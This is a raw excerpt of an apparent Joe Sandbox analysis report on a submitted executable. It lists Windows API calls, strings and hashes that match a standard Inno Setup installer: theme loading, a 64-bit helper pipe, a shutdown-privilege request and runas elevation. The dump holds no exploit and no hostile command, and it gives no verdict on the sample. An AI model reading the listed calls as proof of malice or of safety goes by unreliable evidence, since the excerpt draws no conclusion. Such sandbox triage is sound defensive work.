                                                                                • Part of subcall function 0044AE58: GetVersionExA.KERNEL32(00000094), ref: 0044AE75
                                                                              • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004970B6), ref: 0044AED3
                                                                              • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
                                                                              • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
                                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
                                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
                                                                              • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
                                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
                                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
                                                                              • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
                                                                              • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B01D
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B02F
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B041
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B053
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B065
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B077
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B089
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B09B
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B0AD
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B0BF
                                                                              • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B0D1
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B0E3
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B0F5
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B107
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B119
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B12B
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B13D
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B14F
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B161
                                                                              • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B173
                                                                              • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B185
                                                                              • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B197
                                                                              • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B1A9
                                                                              • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B1BB
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B1CD
                                                                              • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B1DF
                                                                              • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B1F1
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B203
                                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B215
                                                                              • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B227
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoadVersion
                                                                              • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                              • API String ID: 1968650500-2910565190
                                                                              • Opcode ID: 58a82c8a34365b473289e4af6432c949e3c28b1c5dfbf877b155a0c5010eab07
                                                                              • Instruction ID: a412a743d8d6f7d45af61582fe4c6e78a33dc70606a22357c48ac29c98de50d6
                                                                              • Opcode Fuzzy Hash: 58a82c8a34365b473289e4af6432c949e3c28b1c5dfbf877b155a0c5010eab07
                                                                              • Instruction Fuzzy Hash: 5991C9B0640B50EBEF00EFF598C6A2A36A8EB15B14714457BB444EF295D778C814CF9E
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 00457D4F
                                                                              • QueryPerformanceCounter.KERNEL32(02113858,00000000,00457FE2,?,?,02113858,00000000,?,004586DE,?,02113858,00000000), ref: 00457D58
                                                                              • GetSystemTimeAsFileTime.KERNEL32(02113858,02113858), ref: 00457D62
                                                                              • GetCurrentProcessId.KERNEL32(?,02113858,00000000,00457FE2,?,?,02113858,00000000,?,004586DE,?,02113858,00000000), ref: 00457D6B
                                                                              • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00457DE1
                                                                              • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02113858,02113858), ref: 00457DEF
                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00498AF0,00000003,00000000,00000000,00000000,00457F9E), ref: 00457E37
                                                                              • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00457F8D,?,00000000,C0000000,00000000,00498AF0,00000003,00000000,00000000,00000000,00457F9E), ref: 00457E70
                                                                                • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                              • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00457F19
                                                                              • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00457F4F
                                                                              • CloseHandle.KERNEL32(000000FF,00457F94,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00457F87
                                                                                • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                              • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                              • API String ID: 770386003-3271284199
                                                                              • Opcode ID: 9bc676f9c34af54fa9c79b55e27a3e393b90950002bff594f479ab37992d8959
                                                                              • Instruction ID: c70edaa48864fe3754a193870ded2551bb9409a03b77fa183b8e4c23b8ad21c8
                                                                              • Opcode Fuzzy Hash: 9bc676f9c34af54fa9c79b55e27a3e393b90950002bff594f479ab37992d8959
                                                                              • Instruction Fuzzy Hash: 66712270A043449EDB10DB69DC45B9EBBF5AB05705F1084BAF908FB283DB7859488F69
                                                                              APIs
                                                                                • Part of subcall function 00476E18: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E31
                                                                                • Part of subcall function 00476E18: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476E37
                                                                                • Part of subcall function 00476E18: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E4A
                                                                                • Part of subcall function 00476E18: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8), ref: 00476E74
                                                                                • Part of subcall function 00476E18: CloseHandle.KERNEL32(00000000,?,?,?,02112BD8,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E92
                                                                                • Part of subcall function 00476EF0: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00476F82,?,?,?,02112BD8,?,00476FE4,00000000,004770FA,?,?,-00000010,?), ref: 00476F20
                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 00477034
                                                                              • GetLastError.KERNEL32(00000000,004770FA,?,?,-00000010,?), ref: 0047703D
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0047708A
                                                                              • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 004770AE
                                                                              • CloseHandle.KERNEL32(00000000,004770DF,00000000,00000000,000000FF,000000FF,00000000,004770D8,?,00000000,004770FA,?,?,-00000010,?), ref: 004770D2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                              • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                              • API String ID: 883996979-221126205
                                                                              • Opcode ID: cdfc9ed65273480b993f908da37bc8b157bd69d2ac5039e997c7e7ab6857fd80
                                                                              • Instruction ID: 1ba95e0e0868ac7cc54db30065146fef24764d75c8f79a60f30d4c8031701125
                                                                              • Opcode Fuzzy Hash: cdfc9ed65273480b993f908da37bc8b157bd69d2ac5039e997c7e7ab6857fd80
                                                                              • Instruction Fuzzy Hash: 6F3162B0A04648AADB10EFAAC841ADEB7B9EF05314F90843BF508F7382D77C59048B59
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422A04
                                                                              • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSendShowWindow
                                                                              • String ID:
                                                                              • API String ID: 1631623395-0
                                                                              • Opcode ID: 2c26266a8c67d7a7ed143539e2fbf203b7c134ad6664bcde8bffe5e01bbb34f6
                                                                              • Instruction ID: 39dda2673d0f757005a7c2ebbeab04d2226afc2b16c541db07efabb99d57c27a
                                                                              • Opcode Fuzzy Hash: 2c26266a8c67d7a7ed143539e2fbf203b7c134ad6664bcde8bffe5e01bbb34f6
                                                                              • Instruction Fuzzy Hash: 8B916171B04214BFD710EFA9DA86F9D77F4AB04314F5500B6F904AB3A2CB78AE409B58
                                                                              APIs
                                                                              • IsIconic.USER32(?), ref: 004183A3
                                                                              • GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
                                                                              • GetWindowRect.USER32(?), ref: 004183DC
                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 004183EA
                                                                              • GetWindowLongA.USER32(?,000000F8), ref: 004183FF
                                                                              • ScreenToClient.USER32(00000000), ref: 00418408
                                                                              • ScreenToClient.USER32(00000000,?), ref: 00418413
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                              • String ID: ,
                                                                              • API String ID: 2266315723-3772416878
                                                                              • Opcode ID: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
                                                                              • Instruction ID: f1655e9c1aaa1f9d3e17845697c0dfec8ab0781743990dff6cd0a114faef5a7c
                                                                              • Opcode Fuzzy Hash: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
                                                                              • Instruction Fuzzy Hash: D6112B71505201AFDB00EF69C885F9B77E8AF49314F18067EBD58DB286D738D900CBA9
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000028), ref: 00454B0F
                                                                              • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00454B15
                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00454B2E
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B55
                                                                              • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B5A
                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00454B6B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                              • String ID: SeShutdownPrivilege
                                                                              • API String ID: 107509674-3733053543
                                                                              • Opcode ID: 4672a8203829a771e5d00f2c17f761bc323a5d0378d5eda1ad4e77e08b45408c
                                                                              • Instruction ID: 73069b54807863efa740a64668e3ddc19e7753e901194602af91027a354c2964
                                                                              • Opcode Fuzzy Hash: 4672a8203829a771e5d00f2c17f761bc323a5d0378d5eda1ad4e77e08b45408c
                                                                              • Instruction Fuzzy Hash: FDF0687068430275E610AA758C07F2B21989784B5DF50492EBE45EE1C3D7BCD44C8A6E
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045C8B1
                                                                              • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045C8C1
                                                                              • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045C8D1
                                                                              • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047DFC7,00000000,0047DFF0), ref: 0045C8F6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$CryptVersion
                                                                              • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                              • API String ID: 1951258720-508647305
                                                                              • Opcode ID: 7e27a9db68ce5781c7a285243bc6d328b0b1bffa5381604cafab58ca7bab5c59
                                                                              • Instruction ID: b92a23805cb6ee5c0910e5f81ef8443a356b34338ef2df7ef9b51b6282c91381
                                                                              • Opcode Fuzzy Hash: 7e27a9db68ce5781c7a285243bc6d328b0b1bffa5381604cafab58ca7bab5c59
                                                                              • Instruction Fuzzy Hash: 87F049F0901700DEDB14DF76BEC633B7695E7A8316F18803BA619A51A2D738044CCA5C
                                                                              APIs
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000,00496884,?,?,00000000,0049A628), ref: 004965BF
                                                                              • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00496642
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,0049667E,?,00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000), ref: 0049665A
                                                                              • FindClose.KERNEL32(000000FF,00496685,0049667E,?,00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000,00496884), ref: 00496678
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$AttributesCloseFirstNext
                                                                              • String ID: isRS-$isRS-???.tmp
                                                                              • API String ID: 134685335-3422211394
                                                                              • Opcode ID: e40fe840e367864820aded220cbe64f4e75f2107195e16c4ed2d0cc84f0cff06
                                                                              • Instruction ID: 7c4f1729e62c340c3776f645c08a9404eac4e90145c78096892548085370b188
                                                                              • Opcode Fuzzy Hash: e40fe840e367864820aded220cbe64f4e75f2107195e16c4ed2d0cc84f0cff06
                                                                              • Instruction Fuzzy Hash: 1A31867190161CAFDF10EF65CC51ACEBBBDDB45314F5144B7A808A32A1EA389F458E58
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(oleacc.dll,?,0044E8DD), ref: 0044C03F
                                                                              • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C050
                                                                              • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C060
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad
                                                                              • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                              • API String ID: 2238633743-1050967733
                                                                              • Opcode ID: c7875b5020b1a0fc70af70b5d3619db3f858b3da6b6721b5bb5bec507322b540
                                                                              • Instruction ID: 768994a2e6e1f30713717b1c29876c1fd16d3b2562f205e666220538aba0b6e7
                                                                              • Opcode Fuzzy Hash: c7875b5020b1a0fc70af70b5d3619db3f858b3da6b6721b5bb5bec507322b540
                                                                              • Instruction Fuzzy Hash: BBF01CB0242701CAFB609FF5ECC672632B4E364708F18557BA0016A2E2C7BD9494CF5E
                                                                              APIs
                                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456809
                                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456830
                                                                              • SetForegroundWindow.USER32(?), ref: 00456841
                                                                              • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00456B19,?,00000000,00456B55), ref: 00456B04
                                                                              Strings
                                                                              • Cannot evaluate variable because [Code] isn't running yet, xrefs: 00456984
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                              • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                              • API String ID: 2236967946-3182603685
                                                                              • Opcode ID: ea9aa7693e661e956a57dff5922af77563df319d7d3b4e1966ed1c34fece0d0f
                                                                              • Instruction ID: c3083c827e1ea9587a1b946928c79dead0c15e552dd32db2ac5f2442617c6554
                                                                              • Opcode Fuzzy Hash: ea9aa7693e661e956a57dff5922af77563df319d7d3b4e1966ed1c34fece0d0f
                                                                              • Instruction Fuzzy Hash: 6391ED34304204EFDB15DF55C961F5ABBF9EB89305F6280BAEC04A7392C639AE14CB59
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455467), ref: 00455358
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045535E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                              • API String ID: 1646373207-3712701948
                                                                              • Opcode ID: 272051455b5cb91d1d868c6395d7d8b05e26e0b6de4e27da94085abeb1e9e08c
                                                                              • Instruction ID: 60eca4a99d751df3d3374a87c4cbf3116f086dd8a9115ea48f17d057e3f27308
                                                                              • Opcode Fuzzy Hash: 272051455b5cb91d1d868c6395d7d8b05e26e0b6de4e27da94085abeb1e9e08c
                                                                              • Instruction Fuzzy Hash: 0741A331A00649AFCF01EFA5D892AEFB7B8EF49305F504566F800F7252D67C5D088B69
                                                                              APIs
                                                                              • IsIconic.USER32(?), ref: 00417D1F
                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
